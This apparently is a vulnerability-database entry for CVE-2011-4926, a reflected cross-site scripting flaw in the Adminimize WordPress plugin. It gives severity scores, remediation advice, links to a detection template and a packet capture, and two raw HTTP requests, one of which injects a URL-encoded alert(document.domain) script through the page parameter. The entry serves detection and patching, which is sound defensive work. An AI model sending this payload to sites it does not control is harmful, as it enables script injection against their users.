🔙 목록으로 돌아가기

CVE-2011-4926: Adminimize 1.7.22 - Cross-Site Scripting

TitleAdminimize 1.7.22 - Cross-Site Scripting
Authordaffainfo
SeverityMedium
ImpactAllows attackers to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions.
RemediationUpdate to the latest version of Adminimize plugin (1.7.22) or apply the necessary patches to fix the XSS vulnerability.
CVSS Score4.3
EPSS Score0.07833
CVE IDCVE-2011-4926
CWE IDCWE-79
Tags cve2011 cve wordpress xss wp-plugin bueltge vkev vuln

🔍 Vulnerability Description

A cross-site scripting vulnerability in adminimize/adminimize_page.php in the Adminimize plugin before 1.7.22 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter.

🌐 HTTP Request

GET /wp-content/plugins/adminimize/readme.txt HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept-Encoding: gzip
GET /wp-content/plugins/adminimize/adminimize_page.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.4
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2011/CVE-2011-4926.yaml

🦈 Packet Capture: ⬇️ Download cve-2011-4926.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A